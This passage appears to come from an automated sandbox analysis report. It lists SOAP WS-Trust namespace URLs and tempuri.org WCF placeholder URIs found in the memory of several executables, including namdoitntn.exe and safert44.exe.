Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.840936360.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
